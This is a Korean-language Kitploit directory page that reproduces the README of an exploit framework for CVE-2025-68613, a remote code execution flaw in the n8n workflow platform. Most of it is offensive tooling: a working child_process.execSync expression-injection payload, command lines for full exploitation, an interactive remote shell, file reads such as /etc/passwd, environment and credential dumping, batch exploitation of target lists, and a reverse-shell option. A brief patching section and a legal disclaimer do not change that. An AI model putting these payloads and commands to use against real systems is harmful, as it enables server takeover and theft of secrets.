Skip to content
KitploitKITPLOIT
도구블로그
Log in
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/hackersatyamrastogi/n8n-exploit-cve-2025-68613-n8n-god-mode-ultimate
Vulnerability ScannersExploitationWeb Application ExploitationInformation GatheringPost-ExploitationPenetration TestingCommand and ControlLearning & EducationRed TeamingRemote Access ToolPayload Development
GitHubhackersatyamrastogi/n8n-exploit-cve-2025-68613-n8n-god-mode-ultimate

n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate

n8n God Mode Ultimate - CVE-2025-68613 Scanner v1.0.0 ║ ║ 워크플로 자동화 원격 코드 실행

저장소 보기
53149개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

n8n God Mode Ultimate - CVE-2025-68613 스캐너 및 익스플로잇 프레임워크

n8n God Mode Ultimate

고급 n8n 워크플로 자동화 RCE 스캐너 및 익스플로잇 도구

Python Version License CVE CVSS Score


🎯 개요

n8n God Mode Ultimate는 n8n 워크플로 자동화 플랫폼에서 CVE-2025-68613을 탐지하고 검증하도록 설계된 종합적인 보안 테스트 프레임워크입니다. 이 치명적인 원격 코드 실행(RCE) 취약점은 워크플로 실행 컨텍스트의 표현식 주입을 통해 특정 n8n 버전에 영향을 미칩니다.

CVE-2025-68613 상세 정보

  • CVSS 점수: 10.0 (Critical)
  • 공격 벡터: 네트워크
  • 공격 복잡도: 낮음
  • 필요 권한: 낮음 (유효한 자격 증명)
  • 사용자 상호작용: 없음
  • 취약점 유형: 표현식 주입 → 원격 코드 실행

영향을 받는 버전:

  • n8n >= 0.211.0 및 < 1.120.4
  • n8n >= 1.121.0 및 < 1.121.1

패치된 버전:

  • n8n >= 1.120.4
  • n8n >= 1.121.1
  • n8n >= 1.122.0

✨ 기능

🔍 탐지 및 스캔

  • 지능형 버전 탐지 - 로그인 페이지 메타데이터에서 n8n 버전 추출
  • 배치 스캔 - 진행률 추적이 포함된 다중 스레드 동시 대상 스캔
  • 여러 스캔 모드:
    • --detect - 버전 탐지만 수행 (가장 빠르고 비침습적)
    • --safe - 익스플로잇 없이 안전한 취약점 확인
    • --poc - RCE 개념 증명 검증
    • --exploit - 전체 익스플로잇 모드

💣 익스플로잇 기능

  • 4가지 익스플로잇 기술:
    1. 스케줄 트리거 - 자동 실행 워크플로 (가장 신뢰성 높음)
    2. 웹훅 트리거 - HTTP 트리거 실행
    3. 코드 노드 - 직접 child_process 접근
    4. 표현식 주입 - 수동 표현식 실행

🎮 God Mode 기능

  • 대화형 셸 - 명령 기록이 있는 완전한 원격 셸
  • 파일 작업:
    • read <파일> - 원격 파일 읽기
    • write <파일> <내용> - 대상에 파일 쓰기
  • 환경 변수 추출 - 모든 환경 변수 덤프
  • 시스템 정보 - OS 세부 정보, 네트워크 구성, 프로세스 정보
  • 리버스 셸 - 선택적 리버스 셸 페이로드 생성
  • 명령 기록 - 내장 기록 추적

📊 고급 기능

  • 자격 증명 열거 - API를 통해 저장된 자격 증명 추출
  • 워크플로 덤프 - 메타데이터와 함께 모든 워크플로 내보내기
  • 구성 추출 - 전체 시스템 구성 덤프
  • 사용자 열거 - 모든 n8n 사용자 나열
  • 실행 로그 분석 - 워크플로 실행에서 명령 출력 파싱
  • 자동 정리 - 실행 후 선택적 워크플로 삭제

🚀 설치

사전 요구 사항

# Python 3.8 이상
python3 --version

# pip 패키지 관리자
pip3 --version

종속성 설치

# 저장소 복제
git clone https://github.com/hackersatyamrastogi/n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate.git
cd n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate

# 필요한 패키지 설치
pip3 install -r requirements.txt

요구 사항

requests>=2.31.0
urllib3>=2.0.0
tqdm>=4.66.0
colorama>=0.4.6

📖 사용법

기본 사용법

# 도움말 메뉴 표시
python3 n8n-godmode-ultimate.py -h

# n8n 버전 탐지 (비침습적)
python3 n8n-godmode-ultimate.py -u http://target:5678 --detect

# 안전한 취약점 확인
python3 n8n-godmode-ultimate.py -u http://target:5678 --safe -e [email protected] -p password

# RCE 개념 증명
python3 n8n-godmode-ultimate.py -u http://target:5678 --poc -e [email protected] -p password

# 전체 익스플로잇
python3 n8n-godmode-ultimate.py -u http://target:5678 --exploit -e [email protected] -p password

God Mode 작업

# 단일 명령 실행
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --cmd "whoami"

# 원격 파일 읽기
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --read-file "/etc/passwd"

# 원격 파일 쓰기
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --write-file "/tmp/test.txt" --content "payload"

# 환경 변수 추출
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --dump-env

# 대화형 셸
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --shell

배치 스캔

# 파일에서 여러 대상 스캔
python3 n8n-godmode-ultimate.py -l targets.txt --detect -t 20

# 배치 익스플로잇
python3 n8n-godmode-ultimate.py -l targets.txt --poc -e [email protected] -p password -t 10

targets.txt 형식:

http://target1:5678
https://target2.example.com
http://192.168.1.100:5678
https://n8n.example.org

대화형 셸 명령

셸 모드 진입 후 (--shell):

n8n> whoami              # 명령 실행
n8n> read /etc/passwd    # 파일 읽기
n8n> env                 # 환경 변수 표시
n8n> info                # 시스템 정보
n8n> history             # 명령 기록
n8n> exit                # 셸 종료

🛠️ 명령줄 옵션

대상 옵션

-u, --url URL             대상 n8n URL
-l, --list FILE           대상 URL이 포함된 파일
-t, --threads NUM         배치 스캔 스레드 수 (기본값: 10)

인증

-e, --email EMAIL         n8n 사용자 이메일
-p, --password PASS       n8n 사용자 비밀번호

스캔 모드

--detect                  버전 탐지만 수행 (가장 빠름)
--safe                    익스플로잇 없이 안전한 확인
--poc                     RCE 개념 증명
--exploit                 전체 익스플로잇 모드

God Mode

--god                     God 모드 활성화
--cmd COMMAND             단일 명령 실행
--read-file PATH          원격 파일 읽기
--write-file PATH         원격 파일 쓰기
--content DATA            쓰기 작업에 사용할 내용
--dump-env                모든 환경 변수 추출
--shell                   대화형 셸 모드
--revshell HOST:PORT      리버스 셸 페이로드

익스플로잇 옵션

--mode MODE               익스플로잇 모드: schedule|webhook|code|expression (기본값: schedule)
--timeout SEC             명령 타임아웃 (초) (기본값: 30)
--cleanup                 실행 후 워크플로 삭제
-k, --insecure           SSL 확인 비활성화
-v, --verbose            상세 출력
-q, --quiet              최소 출력

🔬 기술 세부 정보

익스플로잇 방법론

1. 스케줄 트리거 (권장)

3초마다 자동 실행되는 스케줄 트리거가 있는 워크플로를 생성합니다. 가장 신뢰성 높은 방법입니다.

Payload: {{(function(){
  return this.process.mainModule.require('child_process')
    .execSync('whoami').toString()
})()}}

2. 웹훅 트리거

트리거될 때 명령을 실행하는 HTTP 웹훅 엔드포인트를 생성합니다.

3. 코드 노드

child_process 접근이 있는 코드 노드에 직접 코드를 주입합니다.

4. 표현식 주입

n8n의 표현식 평가 시스템을 통한 수동 실행입니다.

버전 탐지

로그인 페이지의 base64로 인코딩된 Sentry 구성에서 버전을 추출합니다:

<meta name="n8n:config:sentry" content="eyJ2ZXJzaW9uIjoi..." />

사용된 API 엔드포인트

  • /rest/login - 인증
  • /rest/workflows - 워크플로 CRUD 작업
  • /rest/credentials - 자격 증명 열거
  • /rest/executions - 실행 로그 검색
  • /rest/users - 사용자 열거
  • /rest/settings - 시스템 구성

📊 출력 예시

버전 탐지

[*] n8n God Mode Ultimate v1.0.0
[*] 대상: https://target.example.com
[✓] n8n 버전: 1.36.1
[!] 상태: 취약 (< 1.120.4)

RCE 개념 증명

[*] 인증 성공
[*] 익스플로잇 워크플로 생성 중...
[*] 워크플로 ID: hd6LxSY765WBThqd
[*] 명령 실행: whoami
[✓] 명령 실행 성공!
[+] 출력: root

대화형 셸

n8n> whoami
[+] root

n8n> read /etc/hostname
[+] n8n-production-server

n8n> env
[+] 환경 변수:
N8N_ENCRYPTION_KEY=a1b2c3d4e5f6...
DATABASE_HOST=postgres.internal
AWS_ACCESS_KEY_ID=AKIA...

🛡️ 방어 조치

즉시 조치

  1. 패치된 버전으로 업그레이드 (>= 1.120.4 또는 >= 1.121.1)
  2. 기본 자격 증명 비활성화 ([email protected]:admin)
  3. 강력한 인증 구현 (MFA 권장)
  4. 네트워크 분할 - n8n 인스턴스 접근 제한
  5. 워크플로 감사 - 모든 활성 워크플로 검토
  6. 실행 로그 모니터링 - 의심스러운 활동 확인

장기적인 강화

  • 감사 로깅 활성화
  • IP 화이트리스트 구현
  • OAuth/SSO 인증 사용
  • 정기적인 보안 평가
  • n8n 업데이트 유지
  • 저장 데이터 암호화
  • 안전한 자격 증명 저장
  • 네트워크 트래픽 모니터링

⚠️ 법적 고지

승인된 보안 테스트 전용

이 도구는 교육 목적 및 승인된 보안 테스트를 위해 제공됩니다. 사용자는 모든 관련 법률 및 규정을 준수해야 합니다.

⚖️ 법적 요구 사항

다음을 반드시 준수해야 합니다:

  • ✅ 테스트 전 서면 승인 획득
  • ✅ 본인이 소유하거나 테스트 허가를 받은 시스템에서만 사용
  • ✅ 책임 있는 공개 관행 준수
  • ✅ 관련 법률 및 규정 준수
  • ✅ 방어적 보안 목적으로 사용

다음을 해서는 안 됩니다:

  • ❌ 명시적 허가 없이 시스템 테스트
  • ❌ 악의적인 목적으로 사용
  • ❌ 서비스 거부 공격 수행
  • ❌ 승인 없이 데이터 유출 또는 수정
  • ❌ 동의 없이 프로덕션 시스템에 배포

📜 책임

저자는 이 도구의 오용에 대해 어떠한 책임도 지지 않습니다. 컴퓨터 시스템에 대한 무단 접근은 다음 법률에 따라 불법입니다:

  • 컴퓨터 사기 및 남용법 (CFAA) - 미국
  • 컴퓨터 남용법 - 영국
  • EU 사이버 범죄 지침
  • 전 세계 유사 법률

사용 시 위험을 감수하십시오. 귀하의 행동에 대한 책임은 귀하에게 있습니다.


🤝 기여

기여를 환영합니다! 다음 지침을 따라주세요:

  1. 저장소 포크
  2. 기능 브랜치 생성 (git checkout -b feature/improvement)
  3. 변경 사항 커밋 (git commit -am 'Add new feature')
  4. 브랜치 푸시 (git push origin feature/improvement)
  5. 풀 리퀘스트 생성

행동 강령

  • 책임 있는 공개 관행 따르기
  • 보안 기능을 명확하게 문서화
  • 적절한 오류 처리 포함
  • 복잡한 로직에 주석 추가
  • 제출 전 철저히 테스트

📚 참고 자료

CVE 정보

  • CVE-2025-68613 - NVD
  • n8n 보안 권고
도구 다운로드